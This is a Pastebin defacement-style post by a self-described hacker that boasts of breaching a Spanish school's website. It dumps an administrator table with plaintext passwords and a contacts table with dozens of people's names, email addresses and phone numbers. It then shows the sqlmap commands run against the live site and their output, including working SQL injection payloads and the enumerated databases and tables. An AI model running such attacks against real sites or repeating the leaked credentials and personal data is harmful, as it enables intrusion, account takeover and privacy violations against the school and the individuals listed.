API tools faq
paste
Advertisement
Islam-Hacker

Greeting to Saudi Team-2) 7-9-2012

Islam-Hacker
Sep 7th, 2012
612
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.61 KB | None | 0 0
raw download clone embed print report
  1. Greeting To Saudi Team :)
  2. Published by JM511
  3. From Saudi Arabian
  4. BBM;21EB3DBB
  5. ======================
  6.  
  7. FUCKED> www.vedrunasevilla.org
  8. Colegio Santa Joaquina de Vedruna (Sevilla)
  9. Domicilio Social: C/ Espinosa y Cárcel, 49 Voz: 954 93 20 81 Fax: 954 93 26 14 [email protected]. Web oficial. Colegio Santa Joaquina de ...
  10.  
  11. Table: cic_usuarios
  12. [3 entries]
  13. +--------+------------+-------+---------------+---------------------------------+---------+
  14. | activo | id_usuario | idrol | password | token | usuario |
  15. +--------+------------+-------+---------------+---------------------------------+---------+
  16. | 1 | 3 | 1 | me@lo@robaron | I1lvawMdRrfyfV61RQOoT6rWLRXNcoA | ebosque |
  17. | 1 | 1 | 1 | 19117 | I1lvawMdRrfyfV61RQOoT6rWLRXNcoA | jose |
  18. | 1 | 2 | 1 | mi@carro | I1lvawMdRrfyfV61RQOoT6rWLRXNcoA | migomez |
  19. +--------+------------+-------+---------------+---------------------------------+---------+
  20. Database: ciclos1
  21. Table: cic_contactos
  22. [38 entries]
  23. +---------------------------------------+------------+-------------+---------+----------+-----------+-----------------+-------------------------------------+-------------+-----------+-----------+
  24. | email | fecha_c | id_contacto | idciclo | idestado | idestudio | idvia_respuesta | nombre | observacion | respuesta | tlf_c |
  25. +---------------------------------------+------------+-------------+---------+----------+-----------+-----------------+-------------------------------------+-------------+-----------+-----------+
  26. | [email protected] | 2012-09-03 | 375 | 4 | 0 | 1 | 0 | charo | NULL | NULL | 666289058 |
  27. | [email protected] | 2012-09-05 | 383 | 1 | 0 | 1 | 0 | \c1ngela Boyon Recio | NULL | NULL | NULL |
  28. | [email protected] | 2012-08-29 | 361 | 5 | 0 | 3 | 0 | Javier | NULL | NULL | 670436616 |
  29. | [email protected] | 2012-08-27 | 359 | 3 | 0 | 4 | 0 | Macarena Rodr\edguez Silva | NULL | NULL | 687766958 |
  30. | [email protected] | 2012-09-03 | 372 | 1 | 0 | 1 | 0 | Mar\eda Teresa | NULL | NULL | 637147951 |
  31. | NULL | 2012-09-07 | 392 | 1 | 0 | 1 | 0 | NULL | NULL | NULL | NULL |
  32. | [email protected] | 2012-09-03 | 370 | 4 | 0 | 2 | 0 | cristobal | NULL | NULL | NULL |
  33. | [email protected] | 2012-08-29 | 362 | 4 | 0 | 1 | 0 | Benito Cruzado V\e9lez | NULL | NULL | 651955060 |
  34. | [email protected] | 2012-09-04 | 376 | 1 | 0 | 1 | 0 | marina | NULL | NULL | 660119042 |
  35. | [email protected] | 2012-09-07 | 390 | 1 | 0 | 1 | 0 | BEATRIZ ARIAS | NULL | NULL | 954648924 |
  36. | [email protected] | 2012-09-02 | 369 | 4 | 0 | 1 | 0 | Jes\fas | NULL | NULL | 659823718 |
  37. | [email protected] | 2012-08-27 | 358 | 4 | 0 | 1 | 0 | Alejandro Zambrano Cuadrado | NULL | NULL | 640124011 |
  38. | [email protected] | 2012-09-06 | 385 | 4 | 0 | 2 | 0 | Miguel \c1ngel Fern\e1ndez Garc\eda | NULL | NULL | 655909556 |
  39. | [email protected] | 2012-08-27 | 357 | 4 | 0 | 1 | 0 | \c1lvaro Acosta Pizarraya | NULL | NULL | 647904873 |
  40. | [email protected] | 2012-08-29 | 363 | 1 | 0 | 1 | 0 | Antonio David Agraso Lopez | NULL | NULL | 687884815 |
  41. | [email protected] | 2012-09-05 | 382 | 4 | 0 | 1 | 0 | Mercedes Torres Cansino | NULL | NULL | 651496061 |
  42. | [email protected] | 2012-09-05 | 384 | 4 | 0 | 1 | 0 | JOSE ANGEL POSTIGO GONZALEZ | NULL | NULL | 696424913 |
  43. | NULL | 2012-09-01 | 367 | 3 | 0 | 5 | 0 | NULL | NULL | NULL | NULL |
  44. | [email protected] | 2012-08-27 | 360 | 4 | 0 | 1 | 0 | Antonio David Agraso Lopez | NULL | NULL | 687884815 |
  45. | [email protected] | 2012-09-07 | 391 | 1 | 0 | 1 | 0 | Beatriz | NULL | NULL | NULL |
  46. | [email protected] | 2012-09-05 | 381 | 4 | 0 | 2 | 0 | Rafael S\e1nchez P\e9rez | NULL | NULL | 678893038 |
  47. | [email protected] | 2012-09-01 | 368 | 4 | 0 | 2 | 0 | ANA MARIA TRISTAN | NULL | NULL | 696429972 |
  48. | [email protected] | 2012-09-07 | 387 | 1 | 0 | 1 | 0 | lucia | NULL | NULL | 675020933 |
  49. | NULL | 2012-09-04 | 378 | 1 | 0 | 1 | 0 | NULL | NULL | NULL | NULL |
  50. | [email protected] | 2012-08-29 | 364 | 4 | 0 | 1 | 0 | Antonio David Agraso Lopez | NULL | NULL | 687884815 |
  51. | mlmorenozgmail.com | 2012-09-03 | 373 | 1 | 0 | 1 | 0 | Rocio Casares | NULL | NULL | 645527440 |
  52. | [email protected] | 2012-09-06 | 386 | 1 | 0 | 1 | 0 | Teresa Barcel\f3 | NULL | NULL | 659920862 |
  53. | [email protected] | 2012-09-04 | 380 | 1 | 0 | 2 | 0 | Raquel | NULL | NULL | 657112930 |
  54. | NULL | 2012-09-04 | 377 | 1 | 0 | 1 | 0 | NULL | NULL | NULL | NULL |
  55. | [email protected] | 2012-09-03 | 374 | 1 | 0 | 1 | 0 | Marina Duque Gomez | NULL | NULL | 606422828 |
  56. | [email protected] | 2012-09-07 | 388 | 4 | 0 | 1 | 0 | Angel Aguilera Ruiz | NULL | NULL | 954120587 |
  57. | [email protected] | 2012-09-04 | 379 | 1 | 0 | 1 | 0 | Ana \c1vila Romero | NULL | NULL | 671908165 |
  58. | [email protected] | 2012-09-07 | 393 | 4 | 0 | 1 | 0 | Antonio P\e9rez Rives | NULL | NULL | 627878392 |
  59. | [email protected] | 2012-08-30 | 366 | 4 | 0 | 1 | 0 | Manolo Naranjo Fern\e1ndez | NULL | NULL | 675321361 |
  60. | NULL | 2012-09-03 | 371 | 1 | 0 | 1 | 0 | NULL | NULL | NULL | NULL |
  61. | [email protected] | 2012-09-07 | 394 | 5 | 0 | 1 | 0 | Jes\fas Caballero | NULL | NULL | 619209288 |
  62. | [email protected] | 2012-09-07 | 389 | 4 | 0 | 1 | 0 | Anabel Cabeza Martinez | NULL | NULL | 615293435 |
  63. | NULL | 2012-08-30 | 365 | 1 | 0 | 1 | 0 | NULL | NULL | NULL | NULL |
  64. +---------------------------------------+------------+-------------+---------+----------+-----------+-----------------+-------------------------------------+-------------+-----------+-----------+
  65.  
  66. jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://www.vedrunasevilla.org/web_ciclos/web_cic/oferta.php?id_ciclo=1 --dbs
  67.  
  68. sqlmap/0.9 - automatic SQL injection and database takeover tool
  69. http://sqlmap.sourceforge.net
  70.  
  71. [*] starting at: 22:17:38
  72.  
  73. [22:17:39] [INFO] using '/home/jm511/.sqlmap/output/www.vedrunasevilla.org/session' as session file
  74. [22:17:39] [INFO] testing connection to the target url
  75. [22:17:40] [INFO] testing if the url is stable, wait a few seconds
  76. [22:17:41] [INFO] url is stable
  77. [22:17:41] [INFO] testing if GET parameter 'id_ciclo' is dynamic
  78. [22:17:41] [INFO] confirming that GET parameter 'id_ciclo' is dynamic
  79. [22:17:42] [INFO] GET parameter 'id_ciclo' is dynamic
  80. [22:17:42] [INFO] heuristic test shows that GET parameter 'id_ciclo' might be injectable (possible DBMS: MySQL)
  81. [22:17:42] [INFO] testing sql injection on GET parameter 'id_ciclo'
  82. [22:17:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  83. [22:17:45] [INFO] GET parameter 'id_ciclo' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
  84. [22:17:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  85. [22:17:50] [INFO] GET parameter 'id_ciclo' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
  86. [22:17:50] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  87. [22:17:51] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  88. [22:17:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
  89. [22:18:01] [INFO] target url appears to be UNION injectable with 6 columns
  90. [22:18:02] [INFO] GET parameter 'id_ciclo' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
  91. GET parameter 'id_ciclo' is vulnerable. Do you want to keep testing the others? [y/N] y
  92. sqlmap identified the following injection points with a total of 20 HTTP(s) requests:
  93. ---
  94. Place: GET
  95. Parameter: id_ciclo
  96. Type: boolean-based blind
  97. Title: AND boolean-based blind - WHERE or HAVING clause
  98. Payload: id_ciclo=1 AND 7713=7713
  99.  
  100. Type: error-based
  101. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  102. Payload: id_ciclo=1 AND (SELECT 4018 FROM(SELECT COUNT(*),CONCAT(CHAR(58,122,102,101,58),(SELECT (CASE WHEN (4018=4018) THEN 1 ELSE 0 END)),CHAR(58,99,108,106,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  103.  
  104. Type: UNION query
  105. Title: MySQL UNION query (NULL) - 1 to 10 columns
  106. Payload: id_ciclo=1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,122,102,101,58),IFNULL(CAST(CHAR(80,111,109,110,86,73,102,80,109,103) AS CHAR),CHAR(32)),CHAR(58,99,108,106,58)), NULL, NULL#
  107. ---
  108.  
  109. [22:19:44] [INFO] the back-end DBMS is MySQL
  110.  
  111. web application technology: Apache 2.2.13
  112. back-end DBMS: MySQL 5.0
  113. [22:19:44] [INFO] fetching database names
  114. [22:19:44] [INFO] the SQL query used returns 2 entries
  115. available databases [2]:
  116. [*] ciclos1
  117. [*] information_schema
  118.  
  119. [22:19:45] [INFO] Fetched data logged to text files under '/home/jm511/.sqlmap/output/www.vedrunasevilla.org'
  120.  
  121. [*] shutting down at: 22:19:45
  122.  
  123. jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://www.vedrunasevilla.org/web_ciclos/web_cic/oferta.php?id_ciclo=1 -D ciclos1 --tables
  124.  
  125. sqlmap/0.9 - automatic SQL injection and database takeover tool
  126. http://sqlmap.sourceforge.net
  127.  
  128. [*] starting at: 22:20:09
  129.  
  130. [22:20:09] [INFO] using '/home/jm511/.sqlmap/output/www.vedrunasevilla.org/session' as session file
  131. [22:20:09] [INFO] resuming injection data from session file
  132. [22:20:09] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  133. [22:20:09] [INFO] testing connection to the target url
  134. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  135. ---
  136. Place: GET
  137. Parameter: id_ciclo
  138. Type: boolean-based blind
  139. Title: AND boolean-based blind - WHERE or HAVING clause
  140. Payload: id_ciclo=1 AND 7713=7713
  141.  
  142. Type: error-based
  143. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  144. Payload: id_ciclo=1 AND (SELECT 4018 FROM(SELECT COUNT(*),CONCAT(CHAR(58,122,102,101,58),(SELECT (CASE WHEN (4018=4018) THEN 1 ELSE 0 END)),CHAR(58,99,108,106,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  145.  
  146. Type: UNION query
  147. Title: MySQL UNION query (NULL) - 1 to 10 columns
  148. Payload: id_ciclo=1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,122,102,101,58),IFNULL(CAST(CHAR(80,111,109,110,86,73,102,80,109,103) AS CHAR),CHAR(32)),CHAR(58,99,108,106,58)), NULL, NULL#
  149. ---
  150.  
  151. [22:20:10] [INFO] the back-end DBMS is MySQL
  152.  
  153. web application technology: Apache 2.2.13
  154. back-end DBMS: MySQL 5.0
  155. [22:20:10] [INFO] fetching tables for database 'ciclos1'
  156. [22:20:10] [INFO] the SQL query used returns 17 entries
  157. Database: ciclos1
  158. [17 tables]
  159. +--------------------+
  160. | cic_asignaturas |
  161. | cic_ciclos |
  162. | cic_contactos |
  163. | cic_cursos |
  164. | cic_enlaces |
  165. | cic_estados |
  166. | cic_estudios |
  167. | cic_extensiones |
  168. | cic_familias |
  169. | cic_ficheros |
  170. | cic_noticias |
  171. | cic_preguntas |
  172. | cic_tipos_enl |
  173. | cic_tipos_noticia |
  174. | cic_usuarios |
  175. | cic_via_respuestas |
  176. | zz_bck_cic_ciclos |
  177. +--------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!